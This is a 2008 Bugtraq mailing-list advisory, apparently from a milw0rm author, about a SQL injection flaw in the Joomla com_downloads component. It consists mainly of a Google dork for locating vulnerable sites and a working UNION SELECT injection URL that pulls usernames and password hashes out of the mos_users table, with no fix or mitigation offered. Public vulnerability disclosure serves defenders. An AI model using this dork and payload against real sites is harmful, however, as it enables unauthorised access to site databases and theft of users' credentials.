
Date: 16 Feb 2008 19:48:56 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: joomla SQL Injection (cat)(com_downloads)


#########################################################################
# 
#   joomla SQL Injection (cat)(com_downloads)
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334 
#
# MA&#304;L : www.milw0rm.com@...il.com
#
#########################################################################
# 
#  DORK 1 : allinurl:"selectcat"com_downloads
# 
#########################################################################
   EXPLOIT : 

index.php?option=com_downloads&Itemid=S@...&func=selectcat&cat=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*  

#########################################################################
# S@BUN      i AM NOT HACKER          S@BUN 
#########################################################################
